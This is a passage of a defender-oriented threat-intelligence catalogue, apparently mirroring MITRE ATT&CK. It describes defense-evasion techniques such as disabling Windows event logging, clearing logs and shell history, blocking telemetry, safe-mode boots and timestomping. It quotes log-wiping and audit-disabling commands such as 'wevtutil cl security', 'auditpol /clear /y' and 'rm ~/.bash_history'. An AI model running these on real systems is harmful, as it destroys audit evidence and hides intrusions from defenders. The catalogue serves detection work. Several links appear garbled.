Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.<sup>[[chasing_avaddon_ransomware](https://app.tidalcyber.com/references/c5aeed6b-2d5d-4d49-b05e-261d565808d9)]</sup><sup>[[dharma_ransomware](https://app.tidalcyber.com/references/dfd168c0-40da-4402-a123-963eb8e2125a)]</sup><sup>[[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)]</sup><sup>[[doppelpaymer_crowdstrike](https://app.tidalcyber.com/references/54b5d8af-21f0-4d1c-ada8-b87db85dd742)]</sup> For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.<sup>[[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)]</sup>

Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)), which may lead to bypassing anti-tampering features.<sup>[[avoslocker_ransomware](https://app.tidalcyber.com/references/ea2756ce-a183-4c80-af11-92374ad045b2)]</sup>

The tag is: misp-galaxy:technique="Disable or Modify Tools"

Disable Windows Event Logging

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.<sup>[[Windows Log Events](https://app.tidalcyber.com/references/53464503-6e6f-45d8-a208-1820678deeac)]</sup> This data is used by security tools and analysts to generate detections.

The EventLog service maintains event logs from various system components and applications.<sup>[[EventLog_Core_Technologies](https://app.tidalcyber.com/references/2a1f452f-57b6-4764-b474-befa7787642d)]</sup> By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.<sup>[[Audit_Policy_Microsoft](https://app.tidalcyber.com/references/9ff43f64-7fcb-4aa3-9599-9d00774d8da5)]</sup><sup>[[Advanced_sec_audit_policy_settings](https://app.tidalcyber.com/references/9aef57b1-1a2e-4833-815e-887616cc0570)]</sup> <code>auditpol.exe</code> may also be used to set audit policies.<sup>[[auditpol](https://app.tidalcyber.com/references/20d18ecf-d7d3-4433-9a3c-c28be71de4b1)]</sup>

Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start=disabled</code> commands (followed by manually stopping the service using <code>Stop-Service -Name EventLog</code>).<sup>[[Disable_Win_Event_Logging](https://app.tidalcyber.com/references/0fa5e507-33dc-40ea-b960-bcd9aa024ab1)]</sup><sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup> Additionally, the service may be disabled by modifying the “Start” value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog</code> then restarting the system for the change to take effect.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.<sup>[[winser19_file_overwrite_bug_twitter](https://app.tidalcyber.com/references/158d971e-2f96-5200-8a87-d3887de30ff0)]</sup> Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.<sup>[[auditpol.exe_STRONTIC](https://app.tidalcyber.com/references/c8a305b3-cd17-4415-a740-32787da703cd)]</sup><sup>[[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)]</sup> To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.<sup>[[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)]</sup>

By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

The tag is: misp-galaxy:technique="Disable Windows Event Logging"

Downgrade Attack

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.

Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) or [Network Sniffing]([Praetorian TLS Downgrade Attack 2014(https://app.tidalcyber.com/references/4375602d-4b5f-476d-82f8-3cef84d3378e)]</sup> For example, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) while running malicious scripts that may have otherwise been detected.<sup>[[CrowdStrike BGH Ransomware 2021](https://app.tidalcyber.com/references/a4cb3caf-e7ef-4662-93c6-63a0c3352a32)]</sup><sup>[[Mandiant BYOL 2018](https://app.tidalcyber.com/references/104a1c1c-0899-4ff9-a5c4-73de702c467d)]</sup><sup>[[att_def_ps_logging](https://app.tidalcyber.com/references/52212570-b1a6-4249-99d4-3bcf66c27140)]</sup>

Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.<sup>[[Targeted SSL Stripping Attacks Are Real](https://app.tidalcyber.com/references/714528e8-0f2e-50a3-93c0-c560a34ba973)]</sup><sup>[[Crowdstrike Downgrade](https://app.tidalcyber.com/references/47856c5f-6c4c-5b4c-bbc1-ccb6848d9b74)]</sup>

The tag is: misp-galaxy:technique="Downgrade Attack"

Impair Command History Logging

Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected.

Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.

On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.<sup>[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)]</sup><sup>[[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)]</sup><sup>[[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]</sup>

Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to disable historical command logging (e.g. <code>no logging</code>).

The tag is: misp-galaxy:technique="Impair Command History Logging"

Indicator Blocking

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting<sup>[[Microsoft Lamin Sept 2017](https://app.tidalcyber.com/references/84b8b159-6e85-4329-8903-aca156f4ed84)]</sup> or even disabling host-based sensors, such as Event Tracing for Windows (ETW)<sup>[[Microsoft About Event Tracing 2018](https://app.tidalcyber.com/references/689d944f-ad66-4908-91fb-bb1ecdafe8d9)]</sup>, by tampering settings that control the collection and flow of event telemetry.<sup>[[Medium Event Tracing Tampering 2018](https://app.tidalcyber.com/references/cd1a7b9a-183f-4acf-95c8-14d9475d0551)]</sup> These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) or [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a).

For example, adversaries may modify the File value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors <sup>[[LemonDuck](https://app.tidalcyber.com/references/3a7ea56a-3b19-4b69-a206-6eb7c4ae609d)]</sup>.

The tag is: misp-galaxy:technique="Indicator Blocking"

Safe Mode Boot

Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.<sup>[[Microsoft Safe Mode](https://app.tidalcyber.com/references/fdddb25b-22ba-4433-b25f-bad340ffc849)]</sup><sup>[[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)]</sup>

Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.<sup>[[Microsoft bcdedit 2021](https://app.tidalcyber.com/references/40dedfcb-f666-4f2d-a518-5cd4ae2e273c)]</sup>

Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)). Malicious [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) objects may also be registered and loaded in safe mode.<sup>[[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)]</sup><sup>[[CyberArk Labs Safe Mode 2016](https://app.tidalcyber.com/references/bd9c14dd-0e2a-447b-a245-f548734d2400)]</sup><sup>[[Cybereason Nocturnus MedusaLocker 2020](https://app.tidalcyber.com/references/f7b41120-8455-409f-ad9c-815c2c43edfd)]</sup><sup>[[BleepingComputer REvil 2021](https://app.tidalcyber.com/references/790ef274-aea4-49b7-8b59-1b95185c5f50)]</sup>

The tag is: misp-galaxy:technique="Safe Mode Boot"

Spoof Security Alerting

Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.<sup>[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)]</sup> Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.

Rather than or in addition to [Indicator Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.

For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.<sup>[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)]</sup>

The tag is: misp-galaxy:technique="Spoof Security Alerting"

Impair Defenses

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.<sup>[[Emotet shutdown](https://app.tidalcyber.com/references/02e6c7bf-f81c-53a3-b771-fd77d4cdb5a0)]</sup>

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

The tag is: misp-galaxy:technique="Impair Defenses"

Impersonation

Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.

In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims — deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://app.tidalcyber.com/technique/b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9).

Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as payment, request, or urgent to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.  

Impersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://app.tidalcyber.com/technique/aea36489-047e-4c4a-ab26-c51fd3556182) and [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to substantiate their false identity.<sup>[[CrowdStrike-BEC](https://app.tidalcyber.com/references/7e674a8d-e79f-5cb0-8ad2-a7678e647c6f)]</sup>

There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) targeting one organization which can then be used to support impersonation against other entities.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>

The tag is: misp-galaxy:technique="Impersonation"

Implant Internal Image

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>

A tool has been developed to facilitate planting backdoors in cloud container images.<sup>[[Rhino Labs Cloud Backdoor September 2019](https://app.tidalcyber.com/references/ac31b781-dbe4-49c2-b7af-dfb23d435ce8)]</sup> If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell]([Rhino Labs Cloud Image Backdoor Technique Sept 2019(https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>

The tag is: misp-galaxy:technique="Implant Internal Image"

Clear Command History

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.

Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.<sup>[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)]</sup>

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.<sup>[[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)]</sup><sup>[[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]</sup>

The tag is: misp-galaxy:technique="Clear Command History"

Clear Linux or Mac System Logs

Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:<sup>[[Linux Logs](https://app.tidalcyber.com/references/aa25e385-802c-4f04-81bb-bb7d1a7599ec)]</sup>

  • <code>/var/log/messages:</code>: General and system-related messages

  • <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs

  • <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records

  • <code>/var/log/kern.log</code>: Kernel logs

  • <code>/var/log/cron.log</code>: Crond logs

  • <code>/var/log/maillog</code>: Mail server logs

  • <code>/var/log/httpd/</code>: Web server access and error logs

The tag is: misp-galaxy:technique="Clear Linux or Mac System Logs"

Clear Mailbox Data

Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.

Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](Internal Spearphishing(https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b), [Email Collection](https://app.tidalcyber.com/technique/3569b783-1be5-414b-adb9-42c47ceee1cc), [Mail Protocols](https://app.tidalcyber.com/technique/350fd3f9-2d62-498f-be62-fc4b9907ff02) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.<sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[ExchangePowerShell Module](https://app.tidalcyber.com/references/8af67c2a-15e2-48c9-9ec2-b62ffca0f677)]</sup> On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code> or use [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to interact with APIs on macOS.<sup>[[Cybereason Cobalt Kitty 2017](https://app.tidalcyber.com/references/bf838a23-1620-4668-807a-4354083d69b1)]</sup><sup>[[mailx man page](https://app.tidalcyber.com/references/6813a1a2-fbe0-4809-aad7-734997e59bea)]</sup>

Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup>

The tag is: misp-galaxy:technique="Clear Mailbox Data"

Clear Network Connection History and Configurations

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.

Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under <sup>[[Microsoft RDP Removal](https://app.tidalcyber.com/references/367d3f80-9b13-44fa-938a-744a95518571)]</sup>:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers</code>

Windows may also store information about recent RDP connections in files such as <code>C:\Users\\%username%\Documents\Default.rdp</code> and C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\.<sup>[[Moran RDPieces](https://app.tidalcyber.com/references/794331fb-f1f2-4aaa-aae8-d1c4c95fb00f)]</sup> Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in /Library/Logs and/or /var/log/).<sup>[[Apple Culprit Access](https://app.tidalcyber.com/references/9254d3f5-7fc1-4710-b885-b0ddb3a3dca9)]</sup><sup>[[FreeDesktop Journal](https://app.tidalcyber.com/references/5ded9060-9a23-42dc-b13b-15e4e3ccabf9)]</sup><sup>[[Apple Unified Log Analysis Remote Login and Screen Sharing](https://app.tidalcyber.com/references/a2169171-8e4a-4faa-811c-98b6204a5a57)]</sup>

Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8) or tampering to enable [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.

The tag is: misp-galaxy:technique="Clear Network Connection History and Configurations"

Clear Persistence

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), [Plist File Modification](https://app.tidalcyber.com/technique/ee177ad0-d282-42c0-91f9-7bcf724e3d31), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup> Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account]([Talos - Cisco Attack 2022(https://app.tidalcyber.com/references/143182ad-6a16-5a0d-a5c4-7dae721a9e26)]</sup>

In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.<sup>[[NCC Group Team9 June 2020](https://app.tidalcyber.com/references/0ea8f87d-e19d-438d-b05b-30f2ccd0ea3b)]</sup>

The tag is: misp-galaxy:technique="Clear Persistence"

Clear Windows Event Logs

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer’s alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

  • <code>wevtutil cl system</code>

  • <code>wevtutil cl application</code>

  • <code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

The tag is: misp-galaxy:technique="Clear Windows Event Logs"

File Deletion

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.<sup>[[Microsoft SDelete July 2016](https://app.tidalcyber.com/references/356c7d49-5abc-4566-9657-5ce58cf7be67)]</sup> Examples of built-in [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.

The tag is: misp-galaxy:technique="File Deletion"

Network Share Connection Removal

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) connections can be removed when no longer needed. [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. <sup>[[Technet Net Use](https://app.tidalcyber.com/references/f761d4b6-8fc5-4037-aa34-7982c17f8bed)]</sup>

The tag is: misp-galaxy:technique="Network Share Connection Removal"

Timestomp

Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.

Timestomping may be used along with file name [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to hide malware and tools.<sup>[[WindowsIR Anti-Forensic Techniques](https://app.tidalcyber.com/references/646211a7-77be-4e5a-bd02-eeb70d67113d)]</sup>

The tag is: misp-galaxy:technique="Timestomp"

Indicator Removal

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.

Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

The tag is: misp-galaxy:technique="Indicator Removal"

Indirect Command Execution

